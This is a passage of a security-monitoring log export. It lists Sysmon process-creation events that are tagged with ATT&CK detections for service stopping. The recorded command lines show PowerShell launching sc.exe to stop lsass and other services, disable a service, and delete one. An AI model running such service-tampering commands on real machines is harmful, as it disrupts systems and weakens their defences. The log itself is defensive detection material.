system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.041783700Z"",""eventRecordID"":""2864"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.038\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-001029b92500}\r\nProcessId: 6188\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.038"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-001029b92500}"",""processId"":""6188"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.181",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:54.994 +ProcessGuid: {df9fc3d3-b3ae-5ecf-0000-00106eb52500} +ProcessId: 1240 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Microsoft 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:54.997924200Z"",""eventRecordID"":""2862"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:54.994\r\nProcessGuid: {df9fc3d3-b3ae-5ecf-0000-00106eb52500}\r\nProcessId: 1240\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:54.994"",""processGuid"":""{df9fc3d3-b3ae-5ecf-0000-00106eb52500}"",""processId"":""1240"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.167",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:54.971 +ProcessGuid: {df9fc3d3-b3ae-5ecf-0000-0010e1b32500} +ProcessId: 7940 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Microsoft +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:54.974441400Z"",""eventRecordID"":""2861"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:54.971\r\nProcessGuid: {df9fc3d3-b3ae-5ecf-0000-0010e1b32500}\r\nProcessId: 7940\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:54.971"",""processGuid"":""{df9fc3d3-b3ae-5ecf-0000-0010e1b32500}"",""processId"":""7940"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.121",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 
12:50:54.920 +ProcessGuid: {df9fc3d3-b3ae-5ecf-0000-00103ab12500} +ProcessId: 1348 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop lsass +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:54.928617200Z"",""eventRecordID"":""2858"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:54.920\r\nProcessGuid: {df9fc3d3-b3ae-5ecf-0000-00103ab12500}\r\nProcessId: 1348\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:54.920"",""processGuid"":""{df9fc3d3-b3ae-5ecf-0000-00103ab12500}"",""processId"":""1348"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:19:23.073",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:54.874 +ProcessGuid: {df9fc3d3-b3ae-5ecf-0000-001026ae2500} +ProcessId: 6024 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Microsoft Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:54.877117700Z"",""eventRecordID"":""2855"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:54.874\r\nProcessGuid: {df9fc3d3-b3ae-5ecf-0000-001026ae2500}\r\nProcessId: 6024\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control 
Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:54.874"",""processGuid"":""{df9fc3d3-b3ae-5ecf-0000-001026ae2500}"",""processId"":""6024"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.063",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:54.859 +ProcessGuid: {df9fc3d3-b3ae-5ecf-0000-001024ac2500} +ProcessId: 3440 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ""Microsoft Telemetry"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \""Microsoft Telemetry\"" Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:54.862238800Z"",""eventRecordID"":""2854"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:54.859\r\nProcessGuid: {df9fc3d3-b3ae-5ecf-0000-001024ac2500}\r\nProcessId: 3440\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \""Microsoft Telemetry\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:54.859"",""processGuid"":""{df9fc3d3-b3ae-5ecf-0000-001024ac2500}"",""processId"":""3440"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager 
Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\""Microsoft Telemetry\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.012",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:54.829 +ProcessGuid: {df9fc3d3-b3ae-5ecf-0000-00106aa82500} +ProcessId: 3496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:54.831636400Z"",""eventRecordID"":""2852"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:54.829\r\nProcessGuid: {df9fc3d3-b3ae-5ecf-0000-00106aa82500}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 